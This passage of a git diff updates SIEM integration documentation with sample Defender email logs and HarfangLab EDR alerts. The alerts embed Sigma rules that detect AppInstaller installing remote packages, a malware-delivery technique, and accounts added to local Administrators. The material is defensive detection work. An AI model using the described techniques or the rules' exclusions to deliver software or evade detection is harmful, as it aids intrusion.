+ "time": "2024-10-28T14:31:34.1371671Z",
+ "tenantId": "12345678-abcd-ef09-1234-123456abcdef",
+ "operationName": "Publish",
+ "category": "AdvancedHunting-EmailEvents",
+ "_TimeReceivedBySvc": "2024-10-28T14:18:40.3469550Z",
+ "properties": {
+ "ReportId": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c",
+ "NetworkMessageId": "12345678-1234-abcd-ef90-abcdef123456",
+ "InternetMessageId": "<1@eu-west-1.test.com>",
+ "Timestamp": "2024-10-28T14:18:40Z",
+ "EmailClusterId": 3162398878,
+ "SenderIPv4": "1.2.3.4",
+ "SenderIPv6": null,
+ "SenderMailFromAddress": "john.doe@company.com",
+ "SenderFromAddress": "john.doe@company.com",
+ "SenderMailFromDomain": "company.com",
+ "SenderFromDomain": "company.com",
+ "RecipientEmailAddress": "alan.smithee@company.com",
+ "Subject": "MAIL subject",
+ "EmailDirection": "Inbound",
+ "DeliveryAction": "Delivered",
+ "DeliveryLocation": "Inbox/folder",
+ "EmailAction": null,
+ "EmailActionPolicy": null,
+ "EmailActionPolicyGuid": null,
+ "AttachmentCount": 0,
+ "UrlCount": 0,
+ "EmailLanguage": "en",
+ "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef",
+ "SenderObjectId": null,
+ "SenderDisplayName": null,
+ "ThreatNames": null,
+ "ThreatTypes": null,
+ "DetectionMethods": null,
+ "Connectors": "Relai SMTP interne",
+ "OrgLevelAction": "Allow",
+ "OrgLevelPolicy": "Connection policy",
+ "UserLevelAction": null,
+ "UserLevelPolicy": null,
+ "ConfidenceLevel": null,
+ "AdditionalFields": null,
+ "AuthenticationDetails": "{\"SPF\":\"pass\",\"DKIM\":\"none\",\"DMARC\":\"pass\"}",
+ "BulkComplaintLevel": null
+ },
+ "Tenant": "DefaultTenant"
+ }
+ ```
+
+
+
+=== "test_email_delivered2"
+
+
+ ```json
+ {
+ "time": "2024-10-28T14:39:28.9769628Z",
+ "tenantId": "12345678-abcd-ef09-1234-123456abcdef",
+ "operationName": "Publish",
+ "category": 
"AdvancedHunting-EmailEvents",
+ "_TimeReceivedBySvc": "2024-10-28T14:18:38.5006358Z",
+ "properties": {
+ "ReportId": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c",
+ "NetworkMessageId": "12345678-1234-abcd-ef90-abcdef123456",
+ "InternetMessageId": "<20241028141819.43623347A8F@test.fr>",
+ "Timestamp": "2024-10-28T14:18:38Z",
+ "EmailClusterId": 2633942188,
+ "SenderIPv4": "1.2.3.4",
+ "SenderIPv6": null,
+ "SenderMailFromAddress": "john.doe@test.fr",
+ "SenderFromAddress": "john.doe@test.fr",
+ "SenderMailFromDomain": "test.fr",
+ "SenderFromDomain": "test.fr",
+ "RecipientEmailAddress": "alan.smithee@test.fr",
+ "Subject": "EMAIL Subject",
+ "EmailDirection": "Inbound",
+ "DeliveryAction": "Delivered",
+ "DeliveryLocation": "Inbox/folder",
+ "EmailAction": null,
+ "EmailActionPolicy": null,
+ "EmailActionPolicyGuid": null,
+ "AttachmentCount": 0,
+ "UrlCount": 0,
+ "EmailLanguage": "en",
+ "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef",
+ "SenderObjectId": null,
+ "SenderDisplayName": null,
+ "ThreatNames": null,
+ "ThreatTypes": null,
+ "DetectionMethods": null,
+ "Connectors": "Relai SMTP interne",
+ "OrgLevelAction": "Allow",
+ "OrgLevelPolicy": "Connection policy",
+ "UserLevelAction": null,
+ "UserLevelPolicy": null,
+ "ConfidenceLevel": null,
+ "AdditionalFields": null,
+ "AuthenticationDetails": "{\"SPF\":\"pass\",\"DKIM\":\"none\",\"DMARC\":\"pass\"}",
+ "BulkComplaintLevel": null
+ },
+ "Tenant": "DefaultTenant"
+ }
+ ```
+
+
+
 === "test_email_events"
@@ -1902,7 +2580,7 @@ In this section, you will find examples of raw logs as generated natively by the
 "Action": "Moved to quarantine",
 "DeliveryLocation": "Quarantine",
 "ActionTrigger": "SpecialAction",
- "InternetMessageId": "<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>",
+ "InternetMessageId": "<1@eu-west-1.amazonses.com>",
 "ThreatTypes": "Spam",
 "DetectionMethods": "{\"Spam\":[\"Fingerprint matching\"]}"
 },
@@ -2185,7 +2863,7 @@ In this section, you will find examples of raw logs as generated natively by the
 "Phone": null,
 "CreatedDateTime": "2024-07-20T02:45:30Z",
 "DistinguishedName": "CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local",
- "OnPremSid": "S-1-5-21-2308620423-2764619233-3639949770-5127445",
+ "OnPremSid": "S-1",
 "CloudSid": "S-1",
 "IsAccountEnabled": true,
 "SourceProvider": "AzureActiveDirectory",
diff --git a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md
index 4f19add9e..1ed988a5e 100644
--- a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md
+++ b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md
@@ -1165,7 +1165,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "id": "111111111111111"
 },
 "crowdstrike": {
- "base_filename": "svchost.exe",
 "customer_id": "222222222222222222222"
 },
 "file": {
@@ -1181,6 +1180,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "platform": "win"
 }
 },
+ "process": {
+ "command_line": "svchost.exe",
+ "name": "svchost.exe"
+ },
 "related": {
 "ip": [
 "4.3.2.1"
@@ -2396,7 +2399,6 @@ The following table lists the fields that are extracted, normalized under the EC
 |`@timestamp` | `date` | Date/time when the event originated. |
 |`agent.id` | `keyword` | Unique identifier of this agent. |
 |`agent.version` | `keyword` | Version of the agent. |
-|`crowdstrike.base_filename` | `keyword` | Base Filename |
 |`crowdstrike.customer_id` | `keyword` | Customer ID (cid) |
 |`crowdstrike.gateway_ip` | `ip` | Gateway IP |
 |`crowdstrike.gateway_mac` | `keyword` | Gateway MAC |
diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md
index 4e1878af8..80a99c5e0 100644
--- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md
+++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md
@@ -468,6 +468,201 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 ```
+=== "alert_4.json"
+
+ ```json
+
+ {
+ "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 
Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft 
Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the 
accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed 
URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}",
+ "event": {
+ "category": [
+ "process"
+ ],
+ "dataset": "alert",
+ "kind": "alert",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-18T09:18:31.558000Z",
+ "agent": {
+ "id": "11111111-aaaa-bbbb-cccc-222222222222",
+ "name": "harfanglab"
+ },
+ "file": {
+ "hash": {
+ "md5": "b4e821b2dac20d8d2ac6889f9c3fc315",
+ "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+ "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45"
+ }
+ },
+ "harfanglab": {
+ "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c",
+ "alert_subtype": "process",
+ "alert_time": "2024-11-18T09:18:31.852+00:00",
+ "alert_unique_id": "11111111-2222-3333-4444-555555555555",
+ "execution": 0,
+ "groups": [
+ "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}"
+ ],
+ "level": "medium",
+ "status": "new"
+ },
+ "host": {
+ "domain": "DOMAINSI",
+ "hostname": "HOST01",
+ "name": "HOST01",
+ "os": {
+ "full": "Windows 10 Pro",
+ "version": "10.0.19045"
+ }
+ },
+ "log": {
+ "hostname": "HOST01"
+ },
+ "process": {
+ "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca",
+ "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe",
+ "name": "AppInstaller.exe",
+ "parent": {
+ "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p",
+ "executable": "C:\\Windows\\System32\\svchost.exe"
+ },
+ "pe": {
+ "company": "Microsoft Corporation",
+ "description": "AppInstaller.exe",
+ "file_version": "1.24.25180.00000",
+ "imphash": "714FD4ADFC932C947A3949463867BE18",
+ "original_file_name": "AppInstaller.exe",
+ "product": "Microsoft Desktop App Installer"
+ },
+ "pid": 20188,
+ "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\"
+ },
+ "related": {
+ "hash": [
+ "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45",
+ "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+ "b4e821b2dac20d8d2ac6889f9c3fc315"
+ ],
+ "hosts": [
+ "HOST01"
+ ],
+ "user": [
+ "DOMAINSI\\JDOE"
+ ]
+ },
+ "rule": {
+ "category": "sigma",
+ "description": 
"Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "name": "Package Installed via AppInstaller from the Internet"
+ },
+ "url": {
+ "domain": "url.integration.com",
+ "original": "https://url.integration.com/test",
+ "path": "/test",
+ "port": 443,
+ "registered_domain": "integration.com",
+ "scheme": "https",
+ "subdomain": "url",
+ "top_level_domain": "com"
+ },
+ "user": {
+ "name": "DOMAINSI\\JDOE",
+ "roles": "DOMAIN_Postes_de_travail_Windows"
+ }
+ }
+
+ ```
+
+
+=== "alert_5.json"
+
+ ```json
+
+ {
+ "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain 
admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": 
\"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a 
malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } + + ``` + + === "alert_false_positive.json" ```json 
@@ -2916,6 +3111,7 @@ The following table lists the fields that are extracted, normalized under the EC |`rule.name` | `keyword` | Rule name | |`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | |`url.path` | `wildcard` | Path of the request, such as "/search". | |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.id` | `keyword` | Unique identifier of the user. | diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md index a74c24adf..43badf142 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2_sample.md 
@@ -533,6 +533,266 @@ In this section, you will find examples of raw logs as generated natively by the +=== "alert_4" + + + ```json + { + "log_type": "alert", + "maturity": "stable", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "@timestamp": "2024-11-18T09:18:31.852+00:00", + "ingestion_date": "2024-11-18T09:18:31.852+00:00", + "@event_create_date": "2024-11-18T09:18:31.558Z", + "detection_date": "2024-11-18T09:18:31.558+00:00", + "rule_name": "Package Installed via AppInstaller from the Internet", + "rule_id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "msg": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "type": "rtlogs", + "alert_subtype": "process", + "alert_type": "sigma", + "status": "new", + "level": "medium", + "level_int": 30, + "execution": 0, + "quarantine": 4, + "details_url_request": { + "url": "https://url.integration.com/test", + "verb": "POST", + "host": "url.integration.com", + "event_time": "2024-11-18T09:18:30.550347Z" + }, + "tags": [ + "attack.initial_access", + "attack.t1189.001" + ], + "mitre_cells": [], + "agent": { + "agentid": "11111111-aaaa-bbbb-cccc-222222222222", + "hostname": "HOST01", + "domain": null, + "domainname": "DOMAINSI", + "dnsdomainname": "intra.domain.fr", + "ostype": "windows", + "osversion": "10.0.19045", + "distroid": null, + "osproducttype": "Windows 10 Pro", + "version": "4.2.10", + "additional_info": {} + }, + "process": { + 
